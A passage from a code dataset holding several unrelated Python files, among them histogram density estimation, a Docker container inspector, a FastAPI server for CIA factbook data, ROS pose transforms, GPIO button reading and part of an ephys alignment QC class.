\"\"\"\n if sum([probs[i]>0 for i in range(len(bin)-1)])==2:\n print(\"There are two bins with positive probs\")\n pprobadj = [i for i in range(1,len(bin)-3) if probs[i]>0 and probs[i+1]>0] # from 1 to -3 bcz excluding the open-ended on the left/right\n if sum(pprobadj)>0:\n print('The two intervals are adjacent and not open-ended')\n min_i = min(pprobadj)\n #print(min_i)\n #print(probs[min_i])\n #print(probs[min_i+1])\n #print(pprobadj[0])\n #print(pprobadj[0]+2)\n #print(probs[min_i] > probs[min_i+1])\n #print(bin[pprobadj[0]])\n #print(bin[pprobadj[0]+2])\n if probs[min_i] > probs[min_i+1]:\n alf = probs[min_i+1]\n lb = bin[pprobadj[0]]\n scl = bin[pprobadj[0]+1]-bin[pprobadj[0]]\n t = scl*(alf/(1-alf) +np.sqrt(alf)/(1-alf))\n ub = bin[pprobadj[0]+1]+t \n h = 2/(t+bin[pprobadj[0]+1]-bin[pprobadj[0]])\n if probs[min_i] < probs[min_i+1]:\n alf = probs[min_i]\n ub = bin[pprobadj[0]+2]\n scl = bin[pprobadj[0]+2]-bin[pprobadj[0]+1]\n t = scl*(alf/(1-alf) + np.sqrt(alf)/(1-alf))\n lb = bin[pprobadj[0]+1]-t \n h = 2/(t+bin[pprobadj[0]+2]-bin[pprobadj[0]+1])\n if probs[min_i] == probs[min_i+1]:\n ub=bin[pprobadj[0]]\n lb=bin[pprobadj[0]+2]\n h = 2/(ub-lb)\n else:\n lb = np.nan\n ub = np.nan\n h = np.nan\n print('Warning: the two intervals are not adjacent or are open-ended')\n return {'lb':lb,'ub':ub,\"height\":h}\n\n\n# -\n\n# #### pdf of a triangle distribution\n#\n# \\begin{eqnarray}\n# f(x)= & 1/2(x-lb) \\frac{x-lb}{(ub+lb)/2}h \\quad \\text{if } x <(lb+ub)/2 \\\\\n# & = 1/2(ub-x) \\frac{ub-x}{(ub+lb)/2}h \\quad \\text{if } x \\geq(lb+ub)/2\n# \\end{eqnarray}\n#\n# \\begin{eqnarray}\n# & Var(x) & = \\int^{ub}_{lb} (x-(lb+ub)/2)^2 f(x) dx \\\\\n# & & = 2 \\int^{(ub+lb)/2}_{lb} (x-(lb+ub)/2)^2 (x-lb) \\frac{x-lb}{(ub+lb)/2}h dx\n# \\end{eqnarray}\n#\n#\n\n# + {\"code_folding\": [0]}\ndef TriangleStats(lb,ub):\n \"\"\"\n parameters\n ----------\n lb and ub: float, left and right bounds of the triangle distribution\n \n returns\n -------\n dict: 2 keys for now\n mean: estimated mean\n variance: estimated variance\n \"\"\"\n \n mean = (lb+ub)/2\n var = (lb**2+ub**2+(lb+ub)**2/4-lb*(lb+ub)/2-ub*(lb+ub)/2-lb*ub)/18\n skew = 0\n kurt = -3/5\n return {\"mean\":mean,\n \"variance\":var,\n 'skewness':skew,\n 'kurtosis':kurt}\n\n\n# -\n\n# ### Case 3. Uniform Distribution\n\n# + {\"code_folding\": [0]}\ndef UniformEst(bin,probs):\n \"\"\"\n This function fits a histogram with only one bin of positive probability to a uniform distribution.\n \n paramters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarrray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n --------\n dict: 2 keys\n lb and ub, float. the left and right bounds of the uniform distribution\n \"\"\"\n pprob=[i for i in range(len(bin)-1) if probs[i]>0]\n if len(pprob)==1:\n if pprob[0]!=0 and pprob[0]!=len(bin)-1:\n lb = bin[pprob[0]]\n ub = bin[pprob[0]+1]\n else:\n lb = np.nan\n ub = np.nan\n else:\n lb = np.nan\n ub = np.nan\n return {\"lb\":lb,\"ub\":ub}\n\n\n# + {\"code_folding\": [0]}\ndef UniformStats(lb,ub):\n \"\"\"\n The function computes the moment of a uniform distribution.\n \n parameters\n ----------\n lb and ub, floats, left and right bounds of uniform distribution\n \n returns\n --------\n dict: 2 keys for now\n mean: estimated mean\n variance: estimated variance \n \"\"\"\n \n if lb.size>0 and ub.size>0:\n print(\"yes\")\n mean = (lb+ub)/2\n var = (ub-lb)**2/12\n skew = 0\n kurt = -5/6\n else:\n mean = np.nan\n var = np.nan\n mean = np.nan\n kurt = np.nan\n return {\"mean\":mean,\n \"variance\":var,\n \"skewness\":skew,\n \"kurtosis\":kurt}\n\n\n# -\n\n# ### Test using made-up data\n\n# + {\"code_folding\": []}\n## test 1: GenBeta Dist\n#sim_bins= np.array([0,0.2,0.32,0.5,1,1.3])\n#sim_probs=np.array([0,0.2,0.5,0.3,0])\n#sim_para = GeneralizedBetaEst(sim_bins,sim_probs)\n#GeneralizedBetaStats(sim_para[0],sim_para[1],0,1)\n\n# + {\"code_folding\": []}\n## test 2: Triangle Dist\n#sim_bins2 = np.array([0,0.2,0.32,0.5,1,1.2])\n#sim_probs2=np.array([0.2,0,0.8,0,0])\n#TriangleEst(sim_bins2,sim_probs2)\n\n# + {\"code_folding\": []}\n## test 3: Uniform Dist\n\n#sim_bins3 = np.array([0,0.2,0.32,0.5,1,1.2])\n#sim_probs3=np.array([0,0,0,0,1])\n#sim_para3 = UniformEst(sim_bins3,sim_probs3)\n#UniformStats(sim_para3['lb'],sim_para3['ub'])\n# -\n\n# ### Test with simulated data from known distribution \n# - we simulate data from a true beta distribution with known parameters\n# - then we estimate the parameters with our module and see how close it is with the true parameters \n\n# + {\"code_folding\": []}\n## simulate a generalized distribution\n#sim_n=50\n#true_alpha,true_beta,true_loc,true_scale=1.4,2.2,0,1\n#sim_data = beta.rvs(true_alpha,true_beta,loc=true_loc,scale=true_scale,size=sim_n)\n#sim_bins2=plt.hist(sim_data)[1]\n#sim_probs2=plt.hist(sim_data)[0]/sim_n\n#sim_est=GeneralizedBetaEst(sim_bins2,sim_probs2)\n#sim_est\n\n# + {\"code_folding\": []}\n## plot the estimated generalized beta versus the histogram of simulated data drawn from a true beta distribution \n#sim_x = np.linspace(true_loc,true_loc+true_scale,sim_n)\n#sim_pdf=beta.pdf(sim_x,sim_est[0],sim_est[1],loc=true_loc,scale=true_scale)\n#plt.plot(sim_x,sim_pdf,label='Estimated pdf')\n#plt.hist(sim_data,density=True,label='Dist of Simulated Data')\n#plt.legend(loc=0)\n\n# + {\"code_folding\": []}\n## This is the synthesized density estimation function\ndef SynDensityStat(bin,\n probs):\n \"\"\"\n Synthesized density estimate module:\n It first detects the shape of histograms\n Then accordingly invoke the distribution-specific tool.\n \n paramters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarrray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n -------\n moments: dict with 2 keys (more to be added in future)\n mean: empty or float, estimated mean \n variance: empty or float, estimated variance \n skewness: empty or float, estimated skewness \n kurtosis: empty or float, estimated kurtosis\n \n \"\"\"\n if sum(probs)==1:\n print(\"probs sum up to 1\")\n ## Beta distributions \n if sum([probs[i]>0 for i in range(len(bin)-1)])>=3:\n print(\"at least three bins with positive probs\")\n para_est=GeneralizedBetaEst(bin,probs)\n if len(para_est)==4:\n print('4 parameters')\n return GeneralizedBetaStats(para_est[0],para_est[1],para_est[2],para_est[3])\n if len(para_est)==2:\n print('2 parameters')\n return GeneralizedBetaStats(para_est[0],para_est[1],0,1)\n ## Triangle distributions\n if sum([probs[i]>0 for i in range(len(bin)-1)])==2:\n #print(\"There are two bins with positive probs\")\n pprobadj = [i for i in range(1,len(bin)-3) if probs[i]>0 and probs[i+1]>0] # from 1 to -3 bcz excluding the open-ended on the left/right\n if sum(pprobadj)>0:\n #print('The two intervals are adjacent and not open-ended')\n para_est=TriangleEst(bin,probs)\n return TriangleStats(para_est['lb'],para_est['ub'])\n if sum([probs[i]>0 for i in range(len(bin)-1)])==1:\n print('Only one interval with positive probs')\n para_est= UniformEst(bin,probs)\n print(para_est)\n return UniformStats(para_est['lb'],para_est['ub'])\n else:\n return {\"mean\":None,\n \"variance\":None,\n \"skewness\":None,\n \"kurtosis\":None}\n else:\n return {\"mean\":np.nan,\n \"variance\":np.nan,\n \"skewness\":np.nan,\n \"kurtosis\":np.nan}\n\n# + {\"code_folding\": []}\n## testing the synthesized estimator function using an arbitrary example created above\n#SynDensityStat(sim_bins3,sim_probs3)['mean']\n","sub_path":"WorkingFolder/PythonCode/DensityEst.py","file_name":"DensityEst.py","file_ext":"py","file_size_in_byte":15507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"561069733","text":"import os\nimport logging\n\nfrom cs251tk.formatters import format_collected_data, markdown, gist\nfrom .gist import post_gist\nfrom .tabulate import asciiify\n\n\ndef record_recording_to_disk(results, file_identifier):\n results = sorted(results, key=lambda file: file['student'])\n results = [file['content'] for file in results]\n output = '\\n'.join(results)\n try:\n os.makedirs('logs', exist_ok=True)\n with open('logs/log-{}.md'.format(file_identifier), 'w', encoding='utf-8') as outfile:\n outfile.write(output)\n except Exception as err:\n logging.warning('error! could not write recording:', err)\n\n\ndef send_recording_to_gist(table, results, assignment):\n \"\"\"Publish a table/result pair to a private gist\"\"\"\n\n # the \"-\" at the front is so that github sees it first and names the gist\n # after the homework\n table_filename = '-cs251 report %s table.txt' % assignment\n files = {\n table_filename: {'content': table},\n }\n\n for file in results:\n filename = file['student'] + '.' + file['type']\n files[filename] = {\n 'content': file['content'].strip()\n }\n\n return post_gist('log for ' + assignment, files)\n\n\ndef save_recordings(records, debug=False):\n \"\"\"Take the list of recordings, group by assignment, then save to disk\"\"\"\n\n results = format_collected_data(records,\n group_by='assignment',\n formatter=markdown,\n debug=debug)\n\n for assignment, content in results.items():\n logging.debug(\"Saving recording for {}\".format(assignment))\n record_recording_to_disk(content, assignment)\n\n\ndef gist_recordings(records, table, debug=False):\n \"\"\"Take the list of recordings, group by assignment, then post to a private gist\"\"\"\n\n results = format_collected_data(records,\n group_by='assignment',\n formatter=gist,\n debug=debug)\n\n for assignment, content in results.items():\n logging.debug(\"Saving recording for {}\".format(assignment))\n\n # clean up the table and make it plain ascii\n table = asciiify(table)\n url = send_recording_to_gist(table, content, assignment)\n print(assignment, 'results are available at', url)\n","sub_path":"cs251tk/toolkit/save_recordings.py","file_name":"save_recordings.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"586776147","text":"#from __future__ import division\nimport requests_unixsocket\nimport json\nimport os\n\n#def logs(c_id):\n # base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n # url = \"/events\"\n# session = requests_unixsocket.Session()\n# resp=session.get(base + url, stream= True)\n# print(resp.iter_lines())\n\ndef logs(c_id):\n base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n url = \"/events\"\n session = requests_unixsocket.Session()\n resp=session.get(base + url, stream= True)\n #for res in resp.json():\n #a='{}'.format(res[\"memory_stats\"])\n #print(resp.content)\n print(resp.content)\n\ndef proc(c_id,stream):\n base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n url = \"/containers/%s/top?ps_args=%s\" % (c_id,stream)\n session = requests_unixsocket.Session()\n resp=session.get(base+url)\n #for res in resp.json():\n #a='{}'.format(res[\"memory_stats\"])\n #print(resp.content)\n a=resp.json()\n print(\"%s\" % a[\"Titles\"])\n print(a[\"Processes\"]) \n\ndef ins(c_id,stream):\n base = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\n url = \"/containers/%s/stats?stream=%s\" % (c_id,stream)\n session = requests_unixsocket.Session()\n resp=session.get(base+url)\n #for res in resp.json():\n #a='{}'.format(res[\"memory_stats\"])\n #print(resp.content)\n a=resp.json()\n b=a[\"memory_stats\"][\"usage\"]\n c=a[\"memory_stats\"][\"max_usage\"]\n print(\"At date & time : %s \"% a[\"read\"])\n print(\"Memory usage : %s\"% ((float(b)*100)/float(c)))\n #b=a[cpu_stats][][]\n print(\"CPU_usage in naoseconds : %s\"% a[\"cpu_stats\"][\"cpu_usage\"][\"total_usage\"])\n\nbase = \"http+unix://%2Fvar%2Frun%2Fdocker.sock\"\nurl = \"/containers/json\"\nsession = requests_unixsocket.Session()\nresp=session.get(base+url) \nprint(\"No. of containers running are : %s \" % sum(1 for i in resp.json()))\nfor item in resp.json():\n #print(resp.content)\n print(\" \")\n a=item[\"Id\"]\n print(\"processId :\")\n os.system(\"sudo docker inspect -f '{{.State.Pid}}' \" + a)\n print(\"Container Id : %s\" % item[\"Id\"])\n print(\"Container name : %s\" % item[\"Names\"][0])\n print(\"Container status : %s\" % item[\"Status\"])\n print(\"Container state : %s\" % item[\"State\"])\n print(\"Container Image Name : %s \" % item[\"Image\"])\n print(\"Container Image ID : %s\" % item[\"ImageID\"])\n print(\"Command inside the container : %s\" % item[\"Command\"])\n print(\"Container NetworkID : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"NetworkID\"])\n print(\"Container MacAddress : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"MacAddress\"])\n print(\"Container Gateway : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"Gateway\"])\n print(\"Container IP Address : %s\" % item[\"NetworkSettings\"][\"Networks\"][\"bridge\"][\"IPAddress\"])\n ins(a, 0)\n #logs(a)\n proc(a, \"ef\")\n","sub_path":"DockInspect.py","file_name":"DockInspect.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"505557488","text":"import pandas as pd\nfrom fastapi import FastAPI\n\napp = FastAPI()\n\ncountries = ['Afghanistan', 'Albania', 'Algeria', 'Andorra', 'Angola', 'Antigua-and-Barbuda', 'Egypt', 'Argentina',\n 'Armenia', 'Australia', 'Austria', 'Azerbaijan', 'Bahrain', 'Bangladesh', 'Barbados', 'Belarus', 'Belgium',\n 'Belize', 'Benin', 'Bhutan', 'Bolivia', 'Bosnia-and-Herzegovina', 'Botswana', 'Brazil', 'Brunei',\n 'Bulgaria', 'Burkina-Faso', 'Burundi', 'Cambodia', 'Cameroon', 'Canada', 'Cabo-Verde',\n 'Central-African-Republic', 'Chad', 'Chile', 'China', 'Colombia', 'Comoros', 'Congo-Republic-of-the',\n 'Costa-Rica', \"Cote-d'Ivoire\", 'Croatia', 'Cuba', 'Cyprus', 'Czechia', 'Korea-North',\n 'Congo-Democratic-Republic-of-the', 'Denmark', 'Djibouti', 'Dominica', 'Dominican-Republic', 'Ecuador',\n 'El-Salvador', 'Equatorial-Guinea', 'Eritrea', 'Estonia', 'Eswatini', 'Ethiopia',\n 'Micronesia-Federated-States-of', 'Fiji', 'Finland', 'France', 'Gabon', 'Georgia', 'Germany', 'Ghana',\n 'Greece', 'Greenland', 'Grenada', 'Guatemala', 'Guinea', 'Guinea-Bissau', 'Guyana', 'Haiti', 'Honduras',\n 'Hong-Kong', 'Hungary', 'Iceland', 'India', 'Indonesia', 'Iraq', 'Ireland', 'Iran', 'Israel', 'Italy',\n 'Jamaica', 'Japan', 'Jordan', 'Kazakhstan', 'Kenya', 'Kiribati', 'Kosovo', 'Kuwait', 'Kyrgyzstan', 'Laos',\n 'Latvia', 'Lebanon', 'Lesotho', 'Liberia', 'Libya', 'Liechtenstein', 'Lithuania', 'Luxembourg', 'Macau',\n 'Madagascar', 'Malawi', 'Malaysia', 'Maldives', 'Mali', 'Malta', 'Marshall-Islands', 'Mauritania',\n 'Mauritius', 'Mexico', 'Moldova', 'Monaco', 'Mongolia', 'Montenegro', 'Morocco', 'Mozambique', 'Burma',\n 'Namibia', 'Nauru', 'Nepal', 'Netherlands', 'New-Zealand', 'Nicaragua', 'Niger', 'Nigeria',\n 'North-Macedonia', 'Norway', 'Oman', 'Pakistan', 'Palau', 'Panama', 'Papua-New-Guinea', 'Paraguay', 'Peru',\n 'Philippines', 'Poland', 'Portugal', 'Qatar', 'Venezuela', 'Korea-South', 'Yemen', 'Romania', 'Russia',\n 'Rwanda', 'Saint-Kitts-and-Nevis', 'Saint-Lucia', 'Saint-Vincent-and-the-Grenadines', 'Samoa',\n 'San-Marino', 'Sao-Tome-and-Principe', 'Saudi-Arabia', 'Senegal', 'Serbia', 'Seychelles', 'Sierra-Leone',\n 'Singapore', 'Slovakia', 'Slovenia', 'Solomon-Islands', 'Somalia', 'South-Africa', 'South-Sudan', 'Spain',\n 'Sri-Lanka', 'Sudan', 'Suriname', 'Sweden', 'Switzerland', 'Syria', 'Taiwan', 'Tajikistan', 'Tanzania',\n 'Thailand', 'Bahamas-The', 'Gambia-The', 'Timor-Leste', 'Togo', 'Tonga', 'Trinidad-and-Tobago', 'Tunisia',\n 'Turkey', 'Turkmenistan', 'Tuvalu', 'Uganda', 'Ukraine', 'United-Arab-Emirates', 'United-Kingdom',\n 'United-States', 'Uruguay', 'Uzbekistan', 'Vanuatu', 'Vietnam', 'West-Bank', 'Mauritania', 'Zambia',\n 'Zimbabwe']\n\nfields = ['country_comparison_infant_mortality_rate', 'crude_oil_production', 'exports',\n 'broadband_fixed_subscriptions', 'budget_surplus_deficit',\n 'carbon_dioxide_emissions_from_consumption_of_energy', 'country_comparison_airports',\n 'country_comparison_area', 'country_comparison_birth_rate',\n 'country_comparison_children_under_the_age_of_5_years_underweight', 'country_comparison_death_rate',\n 'country_comparison_education_expenditures', 'country_comparison_hiv_aids_adult_prevalence_rate',\n 'country_comparison_hiv_aids_deaths', 'country_comparison_hiv_aids_people_living_with_hiv_aids',\n 'gdp_per_capita', 'gdp_real_growth_rate', 'gross_national_saving', 'imports',\n 'industrial_production_growth_rate', 'inflation_rate', 'internet_users', 'labor_force',\n 'natural_gas_consumption', 'natural_gas_exports', 'natural_gas_imports', 'natural_gas_production',\n 'natural_gas_proved_reserves', 'public_debt', 'refined_petroleum_products_consumption',\n 'refined_petroleum_products_exports', 'refined_petroleum_products_imports',\n 'refined_petroleum_products_production', 'reserves_of_foreign_exchange_and_gold', 'taxes_and_other_revenues',\n 'telephones_fixed_lines', 'telephones_mobile_cellular', 'unemployment_rate', 'crude_oil_proved_reserves',\n 'current_account_balance', 'debt_external', 'electricity_consumption', 'electricity_exports',\n 'electricity_from_fossil_fuels', 'electricity_from_hydroelectric_plants', 'electricity_from_nuclear_fuels',\n 'electricity_from_other_renewable_sources', 'electricity_imports',\n 'electricity_installed_generating_capacity', 'electricity_production',\n 'country_comparison_life_expectancy_at_birth', 'country_comparison_maternal_mortality_rate',\n 'country_comparison_median_age', 'country_comparison_merchant_marine',\n 'country_comparison_military_expenditures', 'country_comparison_net_migration_rate',\n 'country_comparison_obesity_adult_prevalence_rate', 'country_comparison_population',\n 'country_comparison_population_growth_rate', 'country_comparison_railways', 'country_comparison_roadways',\n 'country_comparison_total_fertility_rate', 'country_comparison_unemployment_youth_ages_15_24',\n 'country_comparison_waterways', 'crude_oil_exports', 'crude_oil_imports']\n\ndf = pd.read_csv(\"./cia-factbook.csv\")\n\n\n@app.get(\"/\")\nasync def root():\n \"\"\"\n\n :return: welcoming page returning Made by @woosal1337\n \"\"\"\n try:\n return {f\"Made by @woosal1337\"}\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/country\")\nasync def all_countries():\n \"\"\"\n\n :return: list all the available `country` name values\n \"\"\"\n try:\n return countries\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/field\")\nasync def all_fields():\n \"\"\"\n\n :return: list all of the available `field` name values\n \"\"\"\n try:\n return fields\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/country/{country}\")\nasync def read_item(country: str):\n \"\"\"\n\n :param country:\n :return: all of the field values according to the corresponding country\n \"\"\"\n try:\n\n if country not in countries:\n return {\n f\"{country} is not in the list! Go to `/country' to find the full list of all the available countries!\"}\n\n res = {}\n\n for i in df.columns[1:]:\n column_value = float(df[df['country'] == f'{country}'][f'{i}'])\n\n if pd.isnull(column_value):\n res[i] = \"NAN\"\n else:\n res[i] = column_value\n\n return res\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n\n\n@app.get(\"/field/{field}\")\nasync def return_field_values(field: str):\n \"\"\"\n\n :param field:\n :return: dictionary zipped with countries and their according field values\n \"\"\"\n try:\n\n if field not in fields:\n return {\n f\"{field} is not in the list! Go to `/field' to find the full list of all the available fields!\"}\n\n a = [\"NAN\" if pd.isnull(i) else i for i in df[f\"{field}\"]]\n\n return dict(zip(countries, a))\n\n except Exception as e:\n return {f\"{e} has happened!\"}\n","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450334092","text":"from django.shortcuts import render\nfrom .models import Student, Dojo\n\n# Create your views here.\ndef index(request):\n context = {\n 'all_dojos': Dojo.objects.all(),\n 'all_students': Student.objects.all()\n }\n return render(request, 'index.html', context)","sub_path":"lectures/Python/django/django_orm/first_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"180640988","text":"from geometry_msgs.msg import PoseStamped ,Pose, Point, Quaternion, TransformStamped\nfrom tf.transformations import quaternion_multiply, quaternion_inverse, quaternion_matrix\nimport tf\nimport rospy\nimport numpy as np\n\ndef frame_transformation(parent_frame_id, child_frame_id):\n \"\"\" Returns geometry_msgs.msg.Pose\n Retrive the relative transformation pose from parent to child\n \"\"\"\n listener = tf.TransformListener()\n rate = rospy.Rate(10.0)\n while not rospy.is_shutdown():\n try:\n (trans,rot) = listener.lookupTransform(parent_frame_id, child_frame_id, rospy.Time(0))\n return Pose(Point(trans[0],trans[1],trans[2]), Quaternion(rot[0],rot[1],rot[2],rot[3]))\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n rate.sleep()\n\n\ndef transform_pose(source_pose, source_frame, target_frame):\n \"\"\" Returns geometry_msgs.msg.Pose\n Transform the pose into another frame's perspective\n \"\"\"\n pose_stamped = PoseStamped()\n pose_stamped.pose = source_pose\n pose_stamped.header.frame_id = source_frame\n listener = tf.TransformListener()\n rate = rospy.Rate(10.0)\n while not rospy.is_shutdown():\n try:\n target_pose = listener.transformPose(target_frame=target_frame,ps=pose_stamped)\n return target_pose.pose\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n rate.sleep()\n\ndef relative_pose(pose1, pose2):\n \"\"\" Returns geometry_msgs.msg.Pose\n Compute relative pose from pose1 to pose2\n pose1 and pose2 are two poses measured from world frame\n \"\"\"\n # Relative translation: p1 = R^0_1 * p0 + d^0_1\n q1_inv = quaternion_inverse([pose1.orientation.x, pose1.orientation.y,\\\n pose1.orientation.z, pose1.orientation.w])\n T1_inv = quaternion_matrix(q1_inv)\n T1_inv[:3,3] = [-pose1.position.x, -pose1.position.y, -pose1.position.z]\n p2 = np.array([pose2.position.x, pose2.position.y, pose2.position.z, 1.0])\n p_res = T1_inv.dot(p2)\n\n # Relative rotation\n q2 = [pose2.orientation.x,pose2.orientation.y,pose2.orientation.y,pose2.orientation.w]\n q_res = quaternion_multiply(q1_inv, q2)\n\n result = Pose(Point(p_res[0],p_res[1], p_res[2]), Quaternion(q_res[0], q_res[1], q_res[2], q_res[3]))\n return result\n","sub_path":"roganized_grasping/src/roganized_grasping/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"425390386","text":"#!/usr/bin/env python\n\"\"\"Read button.\n\nMake gpio input and enable pull-up resistor.\n\"\"\"\n\nimport os\nimport sys\n\nif not os.getegid() == 0:\n sys.exit('Script must be run as root')\n\nfrom time import sleep\nfrom pyA20.gpio import gpio\nfrom pyA20.gpio import connector\nfrom pyA20.gpio import port\n\n__author__ = \"Stefan Mavrodiev\"\n__copyright__ = \"Copyright 2014, Olimex LTD\"\n__credits__ = [\"Stefan Mavrodiev\"]\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = __author__\n__email__ = \"support@olimex.com\"\n\n#led = port.STATUS_LED\nled = port.PA13\n#button = port.PL3\nbutton = port.PG11\n\n\"\"\"Init gpio module\"\"\"\ngpio.init()\n\n\"\"\"Set directions\"\"\"\ngpio.setcfg(led, gpio.OUTPUT)\ngpio.setcfg(button, gpio.INPUT)\n\n\"\"\"Enable pullup resistor\"\"\"\ngpio.pullup(button, gpio.PULLUP)\n#gpio.pullup(button, gpio.PULLDOWN) # Optionally you can use pull-down resistor\nstate =1\nvalue_out = 1\ntry:\n print (\"Press CTRL+C to exit\")\n while True:\n \"\"\"Since we use pull-up the logic will be inverted\"\"\"\n gpio.output(led, value_out)\n print (\"led out value is %d\" %value_out)\n #if value_out == 1:\tvalue_out = 0\n #else :\tvalue_out = 1\n sleep(0.1)\n state = gpio.input(button) # Read button state\n if state:\n value_out = 1;\n else:\n value_out = 0;\n print (\"get button state is %d\" %state)\n sleep(0.1)\n \n \n\nexcept KeyboardInterrupt:\n print (\"Goodbye.\")\n","sub_path":"python/read_key_PL3.py","file_name":"read_key_PL3.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"157778422","text":"from Procedure import pre_process, feedback, gather_info\nfrom Handling import controls\nfrom Strategy import strategy\nfrom Util import U\n# import time\n\n\ndef Process(s, game, version=3):\n\n # t0 = time.time()\n\n pre_process(s, game)\n gather_info(s)\n strategy(s)\n controls(s)\n feedback(s)\n\n # if not s.counter % 50:\n # print(1 / 60 - (time.time() - t0))\n\n return output(s, version)\n\n\ndef output(s, version):\n if version == 2:\n\n if s.roll != 0 and s.counter % 3 == 1 and abs(s.r) > .04:\n s.yaw = s.roll\n s.powerslide = 1\n\n if s.poG:\n s.yaw = s.steer\n\n return [int((s.yaw + 1) * U / 2), int((s.pitch + 1) * U / 2), int(s.throttle * U),\n int(-s.throttle * U), s.jump, s.boost, s.powerslide]\n\n else:\n\n return [s.throttle, s.steer, s.pitch, s.yaw, s.roll, s.jump, s.boost, s.powerslide]\n","sub_path":"agents/RashBot/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"503035902","text":"import logging\r\nfrom ibllib.atlas import AllenAtlas\r\nfrom ibllib.atlas.regions import BrainRegions\r\nfrom ibllib.pipes import histology\r\nfrom ibllib.ephys.neuropixel import SITES_COORDINATES\r\nimport numpy as np\r\nfrom ibllib.pipes.ephys_alignment import EphysAlignment\r\nfrom ibllib.qc import base\r\nfrom oneibl.patcher import FTPPatcher\r\nfrom ibllib.qc.base import CRITERIA as CRITERIA_BASE\r\n\r\n_log = logging.getLogger('ibllib')\r\nCRITERIA = {\"PASS\": 0.8}\r\n\r\n\r\nclass AlignmentQC(base.QC):\r\n \"\"\"\r\n Class that is used to update the extended_qc of the probe insertion fields with the results\r\n from the ephys alignment procedure\r\n \"\"\"\r\n def __init__(self, probe_id, one=None, brain_atlas=None, channels=True):\r\n super().__init__(probe_id, one=one, log=_log, endpoint='insertions')\r\n\r\n # Data\r\n self.alignments = None\r\n self.xyz_picks = None\r\n self.depths = None\r\n self.cluster_chns = None\r\n self.align_keys_sorted = None\r\n\r\n # Metrics and passed trials\r\n self.sim_matrix = None\r\n self.criteria = CRITERIA\r\n\r\n # Get the brain atlas\r\n self.brain_atlas = brain_atlas or AllenAtlas(25)\r\n # Flag for uploading channels to alyx. For testing purposes\r\n self.channels = channels\r\n\r\n self.insertion = self.one.alyx.rest('insertions', 'read', id=self.eid)\r\n self.resolved = (self.insertion.get('json', {'temp': 0}).get('extended_qc').\r\n get('alignment_resolved', False))\r\n\r\n def load_data(self, prev_alignments=None, xyz_picks=None, depths=None, cluster_chns=None):\r\n \"\"\"\"\r\n Load data required to assess alignment qc and compute similarity matrix. If no arguments\r\n are given load_data will fetch all the relevant data required\r\n \"\"\"\r\n if not np.any(prev_alignments):\r\n aligned_traj = self.one.alyx.rest('trajectories', 'list', probe_insertion=self.eid,\r\n provenance='Ephys aligned histology track')\r\n if len(aligned_traj) > 0:\r\n self.alignments = aligned_traj[0].get('json', {})\r\n else:\r\n self.alignments = {}\r\n return\r\n else:\r\n self.alignments = prev_alignments\r\n\r\n align_keys = [*self.alignments.keys()]\r\n self.align_keys_sorted = sorted(align_keys, reverse=True)\r\n\r\n if len(self.alignments) < 2:\r\n return\r\n\r\n if not np.any(xyz_picks):\r\n self.xyz_picks = np.array(self.insertion['json']['xyz_picks']) / 1e6\r\n else:\r\n self.xyz_picks = xyz_picks\r\n\r\n if not np.any(depths):\r\n self.depths = SITES_COORDINATES[:, 1]\r\n else:\r\n self.depths = depths\r\n\r\n if not np.any(cluster_chns):\r\n _ = self.one.load(self.insertion['session'], dataset_types='clusters.channels',\r\n download_only=True)\r\n self.cluster_chns = np.load(self.one.path_from_eid(self.insertion['session']).\r\n joinpath('alf', self.insertion['name'],\r\n 'clusters.channels.npy'))\r\n else:\r\n self.cluster_chns = cluster_chns\r\n\r\n def compute(self):\r\n \"\"\"\r\n Computes the similarity matrix if > 2 alignments. If no data loaded, wraps around load_data\r\n to get all relevant data needed\r\n \"\"\"\r\n\r\n if self.alignments is None:\r\n self.load_data()\r\n\r\n if len(self.alignments) < 2:\r\n self.log.info(f\"Insertion {self.eid}: One or less alignment found...\")\r\n self.sim_matrix = np.array([len(self.alignments)])\r\n else:\r\n self.log.info(f\"Insertion {self.eid}: Running QC on alignment data...\")\r\n self.sim_matrix = self.compute_similarity_matrix()\r\n\r\n return self.sim_matrix\r\n\r\n def run(self, update=True, upload_alyx=True, upload_flatiron=True):\r\n 